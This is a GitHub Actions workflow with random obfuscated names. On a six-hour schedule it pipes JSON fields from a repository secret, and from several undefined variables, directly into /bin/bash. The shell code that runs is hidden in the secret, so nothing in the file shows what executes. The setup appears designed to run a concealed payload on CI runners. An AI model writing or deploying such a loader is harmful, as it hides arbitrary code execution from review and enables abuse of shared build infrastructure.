name: mingzizxv

on:
  workflow_dispatch:
  schedule:
    - cron: '9 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingzizxv
        env:
          gu82: ${{ secrets.gu82 }}
        run: |
          echo $gu82 | jq -r .fugn842 | /bin/bash
          echo $utcs17 | jq -r .q0735 | /bin/bash
          echo $mtdbw49 | jq -r .db28 | /bin/bash
          echo $xcpjb7 | jq -r .hr157 | /bin/bash
          echo $nli79327 | jq -r .bh13 | /bin/bash
          echo $oxnh936 | jq -r .xav9 | /bin/bash
          echo $l307 | jq -r .jzlj5503 | /bin/bash
          echo $g332 | jq -r .qgsq11954 | /bin/bash
          echo $rztt36 | jq -r .aqde0877 | /bin/bash
          echo $jwtlx3 | jq -r .mcg63 | /bin/bash
          echo $ortw911 | jq -r .xah93513 | /bin/bash
          echo $cif654 | jq -r .yx0502 | /bin/bash
          echo $j3321 | jq -r .pcqha6 | /bin/bash
          echo $tq2 | jq -r .bfjw42408 | /bin/bash

